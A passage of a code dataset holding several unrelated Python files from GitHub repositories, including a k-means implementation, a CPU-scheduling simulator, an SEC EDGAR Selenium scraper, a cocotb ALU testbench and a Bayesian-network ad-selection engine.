abs(state[3]) < .015:\n yvel = 0\n elif state[3] < 0:\n yvel = -1\n else:\n yvel = 1\n\n return State(coords, paddle, xvel, yvel)\n\nmain()\n","repo_name":"jlu368/Part1MP4","sub_path":"pong.py","file_name":"pong.py","file_ext":"py","file_size_in_byte":5702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37205931172","text":"import math\nfrom collections import defaultdict\nimport random\nclass KMeans:\n def __init__(self, clusterCnt, dimensions):\n self.clusterCnt = clusterCnt\n self.dimensions = dimensions\n\n def get_distance_from_point(self, current_point, point):\n dist = 0\n for a, b in zip(current_point, point):\n dist += (a - b)**2\n return math.sqrt(dist)\n\n def pickKPointsAsClusters(self, inputDataMap, relevant_points):\n first_point = random.randint(0, len(relevant_points) - 1)\n selected_points = set()\n selected_points.add(first_point)\n while len(selected_points) < self.clusterCnt:\n global_maxi = float('-inf')\n global_point = None\n for index in relevant_points:\n dimensions = inputDataMap[index]\n current_point = dimensions\n local_mini = float('inf')\n if index in selected_points:\n continue \n for point in selected_points:\n selected_point_tuple = inputDataMap[point]\n dist = self.get_distance_from_point(current_point, selected_point_tuple)\n if dist < local_mini:\n local_mini = dist\n if local_mini > global_maxi:\n global_maxi = local_mini\n global_point = index\n selected_points.add(global_point)\n return selected_points\n\n def placePointsInNearestCentroid(self, selected_clusters, inputDataMap, relevant_points):\n res = defaultdict(list)\n for point in relevant_points:\n dimensions = tuple(inputDataMap[point])\n local_mini = math.inf\n cluster_id = None\n \n for (i, point_tuple) in selected_clusters.items():\n dist = self.get_distance_from_point(dimensions, point_tuple)\n if dist < local_mini:\n local_mini = dist\n cluster_id = i\n res[cluster_id].append(point)\n\n return res\n\n def init_n_d_vector(self, point_n_d: list, num_dimensions: int):\n n_dimensional_vector = []\n for i in range(num_dimensions):\n n_dimensional_vector.append(point_n_d[i])\n return n_dimensional_vector\n\n def updateLocationsOfKCentroids(self, cid_to_points_map, inputDataMap):\n centroid_locations = defaultdict(tuple)\n for (index, points_list) in cid_to_points_map.items():\n num_dimensions = self.dimensions\n n_dimensional_vector = [0] * num_dimensions\n for point in points_list:\n point_n_d = inputDataMap[point]\n for (i, point_dimensional_value) in enumerate(point_n_d):\n n_dimensional_vector[i] += point_dimensional_value\n for i in range(num_dimensions):\n n_dimensional_vector[i] = n_dimensional_vector[i] / len(points_list)\n centroid_locations[index] = tuple(n_dimensional_vector)\n return centroid_locations\n\n def getClusters(self, inputDataMap, relevant_points):\n selected_clusters = list(self.pickKPointsAsClusters(inputDataMap, relevant_points))\n centroids = defaultdict(tuple)\n for (i, point) in enumerate(selected_clusters):\n centroids[i] = tuple(inputDataMap[point])\n prev_assignment_map = None\n cnt = 1\n while True:\n \n cnt += 1\n if cnt > 6:\n break\n point_assignment_map = self.placePointsInNearestCentroid(centroids, inputDataMap, relevant_points)\n if prev_assignment_map:\n no_movement = True\n for key in prev_assignment_map:\n if prev_assignment_map[key] != point_assignment_map[key]:\n no_movement = False\n break\n if no_movement:\n break\n new_centroids = self.updateLocationsOfKCentroids(point_assignment_map, 
inputDataMap)\n            centroids = new_centroids\n            prev_assignment_map = point_assignment_map\n\n\n        return (centroids, point_assignment_map)","repo_name":"copyrosicky/BFRAlgorithm","sub_path":"kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":4182,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}{"seq_id":"38873427033","text":"class PCB(object):\n\n    def __init__(self,name,arrival_time,burst_time,priority = 0):\n        self.name = name\n        self.arrival_time = arrival_time # arrival time\n        self.burst_time = burst_time # burst (service) time\n        self.priority = priority\n\n        self.start_time = None # start time\n        self.runned_time = 0 # time run so far\n        self.finished_time = None # finish time\n\n    def __str__(self):\n        if self.runned_time != None and self.finished_time != None and self.start_time != None:\n            return 'name:'+self.name + ' arrival:' + str(self.arrival_time) + ' burst:' + str(self.burst_time) +' start:' + str(self.start_time) + ' finish:' + str(self.finished_time) + ' runned:' + str(self.runned_time) + ' priority:' + str(self.priority)+' T:'+str(self.T)+' W:'+str(self.W)\n        else:\n            return 'name:'+self.name + ' arrival:' + str(self.arrival_time) + ' burst:' + str(self.burst_time) + ' priority:' + str(self.priority)\n\n    def initPCB(self):\n        self.runned_time = 0\n        self.finished_time = None\n        self.start_time = None\n\nclass MultiQueue(object):\n\n    def __init__(self,level):\n        self.level = level\n        self.queue = []\n        self.nextQueue = None\n\n    def __str__(self):\n        return 'level:' + str(self.level)+' '+str(self.queue)+' '+str(self.nextQueue)\n\nready = []\nblock = []\nrunning = None\nfinished = []\nMAX_TIME = 100000\ndis = lambda p: 'name:' + str(p.name) + ' arrival:' + str(p.arrival_time) + ' burst:' + str(p.burst_time) + ' runned:' + str(p.runned_time)\ndef disMultiQueue(queue):\n    t = queue\n    while t:\n        print('Level: '+str(t.level))\n        print(end=' ')\n        for p in t.queue:\n            print(dis(p),end='\\n  ')\n        t = t.nextQueue\n    print()\n\ndef disList(l):\n    for p in l:\n        print(p)\n\ndef W_and_T(finished):\n    sumT = 0\n    sumW = 0\n    for p in finished:\n        sumT += p.T\n        sumW += p.W\n    print('average turnaround time: '+str(sumT/len(finished)),'average weighted turnaround time: '+str(sumW/len(finished)))\n\ndef Priority():\n    temp_ready = sorted(ready,key= lambda p:p.priority, reverse=True)\n    currTime = MAX_TIME\n    for p in ready:\n        if p.arrival_time < currTime:\n            currTime = int(p.arrival_time)\n    while temp_ready:\n        for p in temp_ready:\n            if p.arrival_time <= currTime:\n                p.start_time = currTime\n                p.finished_time = currTime + p.burst_time\n                p.runned_time = p.finished_time - p.start_time\n                p.T = p.finished_time - p.arrival_time\n                p.W = p.T / p.runned_time\n                print(p)\n                currTime += p.burst_time\n                temp_ready.remove(p)\n                finished.append(p)\n                break\n    print('-------------------------END----------------------------')\n    disList(finished)\n    W_and_T(finished)\n    finished.clear()\n\ndef FCFS():\n    temp_ready = sorted(ready,key=lambda p:p.arrival_time,reverse=True)\n    currTime = temp_ready[-1].arrival_time\n    while temp_ready:\n        pcb = temp_ready.pop()\n        pcb.start_time = currTime\n        pcb.finished_time = currTime + pcb.burst_time\n        pcb.runned_time = pcb.finished_time - pcb.start_time\n        pcb.T = pcb.finished_time - pcb.arrival_time\n        pcb.W = pcb.T/pcb.runned_time\n        currTime = currTime + pcb.burst_time\n        finished.append(pcb)\n    disList(finished)\n    W_and_T(finished)\n    finished.clear()\n    for pcb in ready:\n        pcb.initPCB()\n\ndef SJF():\n    temp_ready = sorted(ready, key=lambda p:p.burst_time) # sort by burst time, ascending\n    currTime = MAX_TIME\n    for pcb in temp_ready:\n        if currTime > int(pcb.arrival_time):\n            currTime = int(pcb.arrival_time)\n    while temp_ready:\n        for pcb in temp_ready:\n            if pcb.arrival_time <= currTime:\n                print(dis(pcb))\n                pcb.start_time = currTime\n                currTime = currTime + int(pcb.burst_time)\n                pcb.finished_time = currTime\n                pcb.runned_time = pcb.finished_time - pcb.start_time\n                pcb.T = pcb.finished_time - pcb.arrival_time\n                pcb.W = pcb.T/pcb.runned_time\n                temp_ready.remove(pcb)\n                finished.append(pcb)\n                break\n    print('----------------------------END--------------------------------------')\n    disList(finished)\n    W_and_T(finished)\n    finished.clear()\n    for p in ready:\n        p.initPCB()\n\ndef TIME():\n    temp_ready = sorted(ready,key=lambda p:p.arrival_time)\n    do = 1\n    currTime = MAX_TIME\n    finished = []\n    for pcb in temp_ready:\n        if currTime > int(pcb.arrival_time):\n            currTime = int(pcb.arrival_time)\n    dis = lambda p:'name:'+str(p.name)+' arrival:'+str(p.arrival_time)+' burst:'+str(p.burst_time)+' runned:'+str(p.runned_time)\n\n    while len(temp_ready) != len(finished):\n        for p in temp_ready:\n            if p.arrival_time <= currTime and (p not in finished):\n                p.runned_time += do\n\n                if p.start_time == None:\n                    p.start_time = currTime\n                if p.runned_time == p.burst_time:\n                    p.finished_time = currTime\n                    p.T = p.finished_time - p.arrival_time\n                    p.W = p.T/p.runned_time\n                    # shared-resource issue\n                    finished.append(p)\n                    # temp_ready.remove(p)\n                print('- Current time:%s'%currTime,dis(p))\n        currTime += do\n    print('------------------------------END------------------------------')\n    disList(finished)\n    W_and_T(finished)\n    finished.clear()\n    for p in ready:\n        p.initPCB()\n\ndef addPCB(currTime,temp_ready,head):\n    for p in temp_ready:\n        if p.arrival_time <= currTime:\n            head.queue.append(p)\n    for p in head.queue:\n        if p in temp_ready:\n            temp_ready.remove(p)\n\ndef doQueue(head,queue,finished,currTime,temp_ready):\n    \"\"\"\n    :param queue: current queue\n    :param finished: finished queue\n    :param currTime: current time\n    :param temp_ready: ready queue\n    :return: queue,finished,currTime,temp_ready\n    \"\"\"\n    # print('curr time:',currTime)\n    addPCB(currTime,temp_ready,head) # processes that have arrived by the current time join the first-level queue\n    disMultiQueue(head) # show the current state of the multilevel queue\n    print('-----------------------------------------------------------------')\n    if head.queue != [] and queue != head:\n        return currTime\n    for p in queue.queue:\n        if not p.start_time:\n            p.start_time = currTime\n        if p.runned_time + 2**queue.level <= p.burst_time:\n            p.runned_time += 2**queue.level\n            currTime += 2**queue.level\n        else:\n            currTime += p.burst_time - p.runned_time\n            p.runned_time = p.burst_time\n        if p.runned_time == p.burst_time: # the process is finished\n            p.finished_time = currTime\n            p.T = p.finished_time - p.arrival_time\n            p.W = p.T/p.runned_time\n            finished.append(p)\n        elif queue.nextQueue != None:\n            t = queue.nextQueue\n            t.queue.append(p)\n        addPCB(currTime,temp_ready,head) # processes that have arrived by the current time join the first-level queue\n        if head.queue != [] and queue != head: # if a new process arrived, go back to the first-level queue\n            break\n\n    for p in finished: # clear finished processes\n        if p in queue.queue:\n            queue.queue.remove(p)\n\n    if queue.nextQueue != None:\n        for p in queue.nextQueue.queue: # clear processes moved to the next-level queue\n            if p in queue.queue:\n                queue.queue.remove(p)\n\n    if head.queue == [] and queue.nextQueue: # if no new process arrived and there is a next-level queue, move down to it\n        currTime = doQueue(head,queue.nextQueue,finished,currTime,temp_ready)\n\n    return currTime\n\ndef multi_LevelQueue():\n    temp_ready = sorted(ready, key=lambda p: p.arrival_time)\n    currTime = temp_ready[0].arrival_time\n    multiQueue = MultiQueue(0)\n    tempQueue = multiQueue\n    for i in range(3): # build the multilevel queue\n        tempQueue.nextQueue = MultiQueue(i+1)\n        tempQueue = tempQueue.nextQueue\n\n    finished = []\n    readyLen = len(temp_ready)\n    while len(finished) != readyLen:\n        currTime = doQueue(multiQueue,multiQueue,finished,currTime,temp_ready)\n        # disMultiQueue(multiQueue) # show the current state of the multilevel queue\n        # print('-----------------------------------------------------------------')\n    print('-------------------------------END----------------------------------------')\n    disList(finished)\n    W_and_T(finished)\n    finished.clear()\n    for p in ready:\n        p.initPCB()\n\nkeep = True\nwhile keep:\n    command = input('>>>')\n    command = command.split(' ')\n\n    if command[0] == 'c' and len(command) == 2:\n        ready.clear()\n        n = int(command[1])\n        for i in range(n):\n            pcb_str = input()\n            pcb_str = pcb_str.split(' ')\n            if len(pcb_str) < 3:\n                print('No.%d input error'%(i+1))\n                continue\n            if len(pcb_str) == 4:\n                pcb = PCB(pcb_str[0], int(pcb_str[1]), int(pcb_str[2]), int(pcb_str[3]))\n            elif len(pcb_str) == 3:\n                pcb = PCB(pcb_str[0], int(pcb_str[1]), int(pcb_str[2]))\n            ready.append(pcb)\n\n    elif command[0] == 'fcfs':\n        FCFS()\n\n    elif command[0] == 'sjf':\n        SJF()\n    elif command[0] == 'time':\n        TIME()\n\n    elif command[0] == 'pri':\n        Priority()\n    elif command[0] == 'mul':\n        multi_LevelQueue()\n\n    elif command[0] == 'exit':\n        keep = False","repo_name":"MoCuishle28/python-practice","sub_path":"DataVisual/osExp/OS_PCB.py","file_name":"OS_PCB.py","file_ext":"py","file_size_in_byte":9801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
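In doQueue above the time slice grows with queue depth (2**queue.level), so a job that keeps exhausting its quantum sinks to levels with longer slices. A standalone toy trace of the quanta a 10-tick burst would receive across the four levels built by multi_LevelQueue (not part of the original file):

quanta = [2 ** level for level in range(4)]  # 1, 2, 4, 8 ticks per level
burst = 10
used = []
for q in quanta:
    if burst <= 0:
        break
    used.append(min(q, burst))  # run for the level's quantum, or whatever is left
    burst -= used[-1]
print(quanta, used)  # [1, 2, 4, 8] [1, 2, 4, 3]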
{"seq_id":"1276714747","text":"from tkinter import *\nfrom tkinter.filedialog import askopenfilename\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport time\nimport pandas as pd\n\n\ndef fintwitPoliceScanner():\n    file = askopenfilename(title = \"Fintwit Police Scanner\", filetypes = ((\"CSV Files\",\"*.csv\"),))\n    fintwit_police_scanner = pd.read_csv(file)\n\n    driver = webdriver.Chrome(executable_path=r'C:\\Users\\\\Desktop\\chromedriver.exe')\n    driver.get('https://www.sec.gov/edgar/search/')\n    time.sleep(0.1)\n\n    more_search_options = driver.find_element_by_id('show-full-search-form')\n    more_search_options.click()\n    time.sleep(1)\n\n    replace_text_from = driver.find_element_by_id('date-from');\n    replace_text_from.send_keys(Keys.CONTROL + \"a\")\n    replace_text_from.send_keys('2020-12-01')\n\n    date_picker_day = driver.find_element_by_class_name('ui-state-default.ui-state-active')\n    date_picker_day.send_keys(Keys.ENTER)\n    time.sleep(0.1)\n\n    filing_drop_down = driver.find_element_by_id('category-select')\n    filing_drop_down.send_keys(Keys.ENTER)\n    time.sleep(0.5)\n\n    enter_the_filing_types = driver.find_element_by_xpath(\"//*[@id='category-type-grp']/ul/li[13]\")\n    enter_the_filing_types.click()\n    time.sleep(0.3)\n\n    filing_types = driver.find_element_by_id('filing-types')\n    filing_types.send_keys('10-K, 10-Q, 8-K, 6-K, 20-F')\n\n    for index, column in fintwit_police_scanner.iterrows():\n        input_the_name = driver.find_element_by_class_name('company.form-control.border-onfocus.hide-on-short-form.text-black')\n        input_the_name.send_keys(column['Name'])\n        time.sleep(0.1)\n\n        please_just_search = driver.find_element_by_class_name('btn.border-onfocus')\n        please_just_search.submit()\n        time.sleep(0.5)\n\n        check_for_no_search_pls = driver.find_element_by_class_name('text-center')\n        time.sleep(0.1)\n\n        if check_for_no_search_pls.text == \"No results found for your search!\":\n            print(column['Name'], \"NULL\")\n\n        else:\n            company_name = driver.find_element_by_xpath(\"//*[@id='hits']/table/tbody/tr[1]/td[4]\")\n            print(column['Name'], company_name.text)\n\n        time.sleep(0.5)\n\n    print(\"Done\")\n\nroot = Tk()\nroot.geometry(\"500x500\")\nroot.configure(background = \"black\")\nroot.title(\"Noremax Scumbag Scanner\")\nupload_button = Button(root, text=\"Upload your .csv file & Run\", fg = \"white\", command=lambda:fintwitPoliceScanner(), background = \"black\", width = 30)\nupload_button.pack(side = BOTTOM, pady= 10)\n\nroot.mainloop()\n","repo_name":"noremaxidk/fintwitpolicescanner","sub_path":"project/searcher.py","file_name":"searcher.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
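The scraper above paces itself with fixed time.sleep calls, which either waste time or race the page. A sketch using Selenium's explicit waits, which block only until the element actually appears (the locator below is illustrative; WebDriverWait and expected_conditions are standard Selenium APIs):

from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By

def wait_for(driver, locator, timeout=10):
    # polls until the element is present, raising TimeoutException otherwise
    return WebDriverWait(driver, timeout).until(
        EC.presence_of_element_located(locator))

# e.g. instead of time.sleep(0.5) before reading results:
# results_table = wait_for(driver, (By.ID, 'hits'))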
{"seq_id":"27177745583","text":"# Python Testbench for Arithmetic Logic Unit (ALU)\n\n# cocotb imports\nimport cocotb\nfrom cocotb.triggers import Timer, Edge, Join\n\n# standard imports\nimport os\nimport sys\nimport numpy as np\nimport random\nimport logging\n\n# adding path for utils\nsys.path.append(os.path.join(os.path.dirname(__file__), '..', '..', '..', 'utils'))\n\n# utils imports\nimport cocotb_utils as utils\n\n# constants\nDATA_WIDTH = 32\n\n# logging setup\nfor handler in logging.root.handlers[:]:\n    logging.root.removeHandler(handler)\n# configure once, outside the removal loop (previously this only ran when a handler already existed)\nlogging.basicConfig(\n    level = logging.DEBUG,\n    format = \"%(message)s\",\n    handlers = [\n        logging.StreamHandler(sys.stdout) \n    ]\n)\n\n# logging function\ndef log(num_test_cases, dut_a_arr, dut_b_arr, op_arr, dut_res_arr, model_res_arr):\n    for i in range(num_test_cases):\n        logging.debug('-------------------- Test # %d --------------------', i)\n        logging.debug('operation   : %s', op_arr[i]  )\n        logging.debug('opr_a       : %s', np.int32(dut_a_arr[i])  )\n        logging.debug('opr_b       : %s', np.int32(dut_b_arr[i])  )\n        logging.debug('RESULT      : %s', dut_res_arr[i].signed_integer )\n        logging.debug('EXPECTED    : %s', np.int32(model_res_arr[i]) )\n        logging.debug('RESULT_BIN  : %s', dut_res_arr[i].binstr  )\n        logging.debug('EXPECTED_BIN: %s', utils.int_to_bin(model_res_arr[i], 32))\n    
Industries Protectron 3001\n'''\n\nimport itertools\nimport unittest\nimport math\nimport numpy as np\nfrom pomegranate import *\n\nclass AdEngine:\n \n \"\"\"\n Responsible for initializing the Decision Network of the\n AdEngine from the structure discovered by Tetrad\n \n :param string data_file: path to csv file containing data on which\n the network's parameters are to be learned\n :param tuple structure: tuple of tuples specifying parental\n relationships between variables in the network; see Pomegranate docs\n for the expected format. Example:\n ((), (0), (1)) represents nodes: [0] -> [1] -> [2]\n :param list dec_vars: list of string names of variables to be\n considered decision points for the agent. Example:\n [\"Ad1\", \"Ad2\"]\n :param dict util_map: discrete, tabular, utility map whose keys\n are variables in network that are parents of a utility node, and\n values are dictionaries mapping that variable's values to a utility\n score, e.g.\n {\n \"X\": {0: 20, 1: -10}\n }\n represents a utility node with single parent X whose value of 0\n has a utility score of 20, and value 1 has a utility score of -10\n \"\"\"\n\n def __init__(self, data_file, structure, dec_vars, util_map):\n data = np.genfromtxt(data_file, dtype=int, names=True, delimiter=',')\n self.names = data.dtype.names\n self.network = BayesianNetwork.from_structure(data.view((int, len(self.names))), structure, state_names=self.names)\n self.dec_vars = dec_vars\n self.dec_vars_values = [list(np.unique(data[v])) for v in dec_vars]\n self.structure = structure\n self.util_map = util_map\n \n def decide(self, evidence):\n \"\"\"\n Given some observed demographic \"evidence\" about a potential\n consumer, selects the ad content that maximizes expected utility\n and returns a dictionary over any decision variables and their\n best values\n \n :param dict evidence: dict mapping network variables to their\n observed values, of the format: {\"Obs1\": val1, \"Obs2\": val2, ...}\n :return: dict of format: {\"DecVar1\": val1, \"DecVar2\": val2, ...}\n \"\"\"\n best_combo, best_util = None, -math.inf\n possible_combos = itertools.product(*self.dec_vars_values)\n for combo in possible_combos:\n cpts = self.network.predict_proba(evidence)\n util_key = list(self.util_map.keys())[0]\n util_index = self.names.index(util_key)\n dec_dict = {d: combo[i] for i, d in enumerate(self.dec_vars)}\n new_evidence = {**dec_dict, **evidence}\n new_cpts = self.network.predict_proba(new_evidence)\n util = 0\n for u in cpts[util_index].parameters[0].keys():\n util += new_cpts[util_index].parameters[0][u] * self.util_map[util_key][u]\n if util > best_util:\n best_combo = dec_dict\n best_util = util\n return best_combo\n\n\nclass AdEngineTests(unittest.TestCase):\n def test_defendotron_ad_engine_t1(self):\n engine = AdEngine(\n data_file = 'hw3_data.csv',\n dec_vars = ['Ad1', 'Ad2'],\n # P A G I T F H S Ad2 Ad1\n structure = ((), (), (0, 9,), (6,), (0, 1,), (1, 8,), (), (2, 5,), (), ()),\n util_map = {'S': {0: 0, 1: 5000, 2: 17760}}\n )\n self.assertEqual(engine.decide({'G': 0}), {'Ad1': 0, \"Ad2\": 1})\n self.assertEqual(engine.decide({'F': 1}), {'Ad1': 1, 'Ad2': 0})\n self.assertEqual(engine.decide({'G': 1, 'T': 0}), {'Ad1': 1, 'Ad2': 1})\n \n def test_defendotron_ad_engine_t2(self):\n engine = AdEngine(\n data_file = 'hw3_data.csv',\n # [!] 
Note: in this example, say we are only deciding upon the ad\n # video (Ad1); our engine's results should adapt accordingly (see\n # tests below)\n dec_vars = ['Ad1'],\n structure = ((), (), (0, 9,), (6,), (0, 1,), (1, 8,), (), (2, 5,), (), ()),\n util_map = {'S': {0: 0, 1: 5000, 2: 17760}}\n )\n self.assertEqual(engine.decide({'A': 1}), {'Ad1': 0})\n self.assertEqual(engine.decide({'P': 1, 'A': 0}), {'Ad1': 1})\n self.assertEqual(engine.decide({'A': 1, 'G': 1, 'T': 1}), {'Ad1': 0})\n\nif __name__ == '__main__':\n unittest.main()\n ","repo_name":"dmoini/cmsi485-artificial-intelligence","sub_path":"homework-3/ad_engine.py","file_name":"ad_engine.py","file_ext":"py","file_size_in_byte":4595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5723201267","text":"from dataclasses import dataclass\nimport pickle\nimport time\n\n@dataclass\nclass GamePacket:\n\n size = 24\n\n __slots__ = ('ballX', 'ballY', 'minX', 'maxX', 'minY', 'maxY')\n\n ballX: int\n ballY: int\n minX: int\n maxX: int\n minY: int\n maxY: int\n\n @staticmethod\n def serialize(packet) -> bytes:\n buf = bytearray(24)\n buf[0:4] = packet.ballX.to_bytes(4, 'little')\n buf[4:8] = packet.ballY.to_bytes(4, 'little')\n buf[8:12] = packet.minX.to_bytes(4, 'little')\n buf[12:16] = packet.maxX.to_bytes(4, 'little')\n buf[16:20] = packet.minY.to_bytes(4, 'little')\n buf[20:24] = packet.maxY.to_bytes(4, 'little')\n return buf\n \n @staticmethod\n def deserialize(buf: bytes):\n assert(len(buf) == GamePacket.size)\n ballX = int.from_bytes(buf[0:4], 'little')\n ballY = int.from_bytes(buf[4:8], 'little')\n minX = int.from_bytes(buf[8:12], 'little')\n maxX = int.from_bytes(buf[12:16], 'little')\n minY = int.from_bytes(buf[16:20], 'little')\n maxY = int.from_bytes(buf[20:24], 'little')\n return GamePacket(ballX, ballY, minX, maxX, minY, maxY)\n","repo_name":"diegofinni/artennis","sub_path":"gamepacket.py","file_name":"gamepacket.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4490713299","text":"\"\"\"\nThis module provides a binary search algorithm implementation.\n\"\"\"\n\n\ndef binary_search(arr: list[int], target: int) -> int:\n \"\"\"\n Search for target in a sorted array using binary search.\n\n :param arr: The sorted array.\n :param target: The target value to search for.\n :return: The index of the target value if found, otherwise -1.\n \"\"\"\n left = 0\n right = len(arr) - 1\n\n while left <= right:\n mid = (left + right) // 2\n if arr[mid] == target:\n return mid\n if arr[mid] < target:\n left = mid + 1\n else:\n right = mid - 1\n\n return -1\n\n\narr: list[int] = [1, 3, 5, 7, 9]\ntarget: int = 5\n\nindex = binary_search(arr, target)\nprint(index) # 2\n\ntarget: int = 9\nindex = binary_search(arr, target)\nprint(index) # 4\n","repo_name":"hovo0/PDP","sub_path":"TreeAlgorithms/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25344497045","text":"# Not needed if library is installed\nfrom os import sys, path\n\nsys.path.insert(0, path.join(\"..\", \"ProbPy\"))\nfrom ProbPy import *\n\n\n# Various ways to declare variables\ncoin = RandVar(\"Coin\", [\"Head\", \"Tail\"])\nball = RandVar(\"Ball\", [\"Red\", \"Green\", \"Blue\"])\ngeneric = RandVar(10, list(range(10)))\nX = RandVar(\"X\", 4)\nY = RandVar(\"Y\")\nAnon1 = 
RandVar(\"_anonymous\", [True, False])\nAnon2 = RandVar(domain=[True, False])\n\n# Execute to see their output\nprint(coin)\nprint(ball)\nprint(generic)\nprint(X)\nprint(Y)\nprint(Anon1)\nprint(Anon2)\n\n# Variables to be used next\nX = RandVar(\"X\", [True, False])\nY = RandVar(\"Y\", [True, False])\nZ = RandVar(\"Z\", [True, False])\nA = RandVar(\"A\", 4)\nB = RandVar(\"B\", 6)\n\n# Also, various ways to declare factors\nX_factor = Factor(X, [0.3, 0.7])\nXY_factor = Factor([X, Y], [0.2, 0.3, 0.1, 0.4])\nXYZ_factor = Factor([X, Y, Z], [[[0.2, 0.3], [0.1, 0.4]], [[0.7, 0.1], [0.1, 0.1]]])\nAB_factor = Factor([A, B])\nscalar = Factor([], 10)\n\n# Check output of factors\nprint(X_factor)\nprint(XY_factor)\nprint(XYZ_factor)\nprint(AB_factor)\nprint(scalar)\n","repo_name":"petermlm/ProbPy","sub_path":"examples/vars_factors_example.py","file_name":"vars_factors_example.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"21"} +{"seq_id":"1907258811","text":"import os\n\ndef changeFileName (lfn):\n lfnnoext = os.path.splitext(lfn)[0]\n inp=lfnnoext.replace('$','_')\n toks=inp.split(\"_\")\n if len(toks)==5:\n print (\"Already good format\")\n return \"\"\n i=0\n nameis=toks[0]+\"_\"+toks[1]+\"_\"+toks[2]\n i=1\n s=toks[3][0:i]\n while s.isdigit():\n i=i+1\n s = toks[3][0:i]\n i=i-1\n s=s[:-1]\n nameis = nameis + \"_\" + s + \"_\" + toks[3][i:] + \".csv\"\n return nameis\n\nlfn='CCWRobot_04032020_141422$2True.csv'\n#lfn='CCWRobot_04032020_141422_2True.csv'\n#changeFileName(lfn)\n\nf = []\nfor (dirpath, dirnames, filenames) in os.walk(r'c:\\temp\\logs'):\n f.extend(filenames)\n break\nfor s in f:\n oldname = os.path.join(r'c:\\temp\\logs', s)\n newname = changeFileName(s)\n if len(newname)>10:\n newname = os.path.join(r'c:\\temp\\logs', newname)\n if oldname.lower() != newname.lower():\n os.rename(oldname, newname)\n","repo_name":"doronweiss/pythontesta","sub_path":"WOB/lognamechanger.py","file_name":"lognamechanger.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"27177745583","text":"# Python Testbench for Arithmetic Logic Unit (ALU)\n\n# cocotb imports\nimport cocotb\nfrom cocotb.triggers import Timer, Edge, Join\n\n# standard imports\nimport os\nimport sys\nimport numpy as np\nimport random\nimport logging\n\n# adding path for utils\nsys.path.append(os.path.join(os.path.dirname(__file__), '..', '..', '..', 'utils'))\n\n# utils imports\nimport cocotb_utils as utils\n\n# constants\nDATA_WIDTH = 32\n\n# logging setup: clear any existing handlers, then configure logging once\nfor handler in logging.root.handlers[:]:\n logging.root.removeHandler(handler)\nlogging.basicConfig(\n level = logging.DEBUG,\n format = \"%(message)s\",\n handlers = [\n logging.StreamHandler(sys.stdout) \n ]\n)\n\n# logging function\ndef log(num_test_cases, dut_a_arr, dut_b_arr, op_arr, dut_res_arr, model_res_arr):\n for i in range(num_test_cases):\n logging.debug('-------------------- Test # %d --------------------', i)\n logging.debug('operation : %s', op_arr[i] )\n logging.debug('opr_a : %s', np.int32(dut_a_arr[i]) )\n logging.debug('opr_b : %s', np.int32(dut_b_arr[i]) )\n logging.debug('RESULT : %s', dut_res_arr[i].signed_integer )\n logging.debug('EXPECTED : %s', np.int32(model_res_arr[i]) )\n logging.debug('RESULT_BIN : %s', dut_res_arr[i].binstr )\n logging.debug('EXPECTED_BIN: %s', utils.int_to_bin(model_res_arr[i], 32))\n 
logging.debug('----------------------------------------------------\\n\\n')\n\n # assertion\n assert dut_res_arr[i].binstr == utils.int_to_bin(model_res_arr[i], 32), f\"ALU Test Failed! for: Test # {i}\"\n\n# read environment variables\nif (\"NUM_PERMS\" in os.environ): \n num_perms = int(os.environ[\"NUM_PERMS\"]) \nelse: \n num_perms = 1\n\nif (\"NUM_TEST_CASES\" in os.environ): \n num_test_cases = int(os.environ[\"NUM_TEST_CASES\"]) \nelse: \n num_test_cases = 1\n\n# seed for random number generator\nnp.random.seed(cocotb.RANDOM_SEED)\n\n# model function for ALU ## TODO: move to a separate file\ndef model(num_test_cases, opr_a_arr, opr_b_arr, op_arr):\n opr_res_arr = []\n for i in range(num_test_cases):\n if (op_arr[i] == 0):\n opr_res_arr.append(opr_a_arr[i] + opr_b_arr[i])\n else:\n opr_res_arr.append(opr_a_arr[i] - opr_b_arr[i])\n return opr_res_arr\n \n# input generator\ndef generate_inputs(num_test_cases, opr_a_arr, opr_b_arr, op_arr):\n for _ in range(num_test_cases):\n opr_a_arr.append(np.random.randint(np.iinfo(np.int32).min, np.iinfo(np.int32).max))\n opr_b_arr.append(np.random.randint(np.iinfo(np.int32).min, np.iinfo(np.int32).max))\n op_arr.append(np.random.randint(0, 1))\n\n# driver\nasync def driver(dut, num_test_cases, delay, opr_a_arr, opr_b_arr, op_arr):\n for i in range(num_test_cases):\n dut.opr_a.value = opr_a_arr[i]\n dut.opr_b.value = opr_b_arr[i]\n dut.op.value = op_arr[i]\n await Timer(delay, units='ns')\n\n# monitor\nasync def monitor(dut, num_test_cases):\n opr_res_arr = []\n for i in range(num_test_cases):\n await Edge(dut.opr_result)\n opr_res_arr.append(dut.opr_result.value)\n return opr_res_arr\n\n# test\n@cocotb.test()\nasync def test_alu(dut):\n opr_a_arr = []\n opr_b_arr = []\n op_arr = []\n\n # step1: generate inputs\n generate_inputs(num_test_cases, opr_a_arr, opr_b_arr, op_arr)\n\n # step2: start monitor and driver threads\n monitor_thread = cocotb.start_soon(monitor(dut, num_test_cases))\n driver_thread = cocotb.start_soon(driver(dut, num_test_cases, 5, opr_a_arr, opr_b_arr, op_arr))\n\n # step3: wait for monitor and driver threads to finish\n await Join(driver_thread)\n dut_result = await Join(monitor_thread)\n\n # step4: calculate expected result\n expected_result = model(num_test_cases, 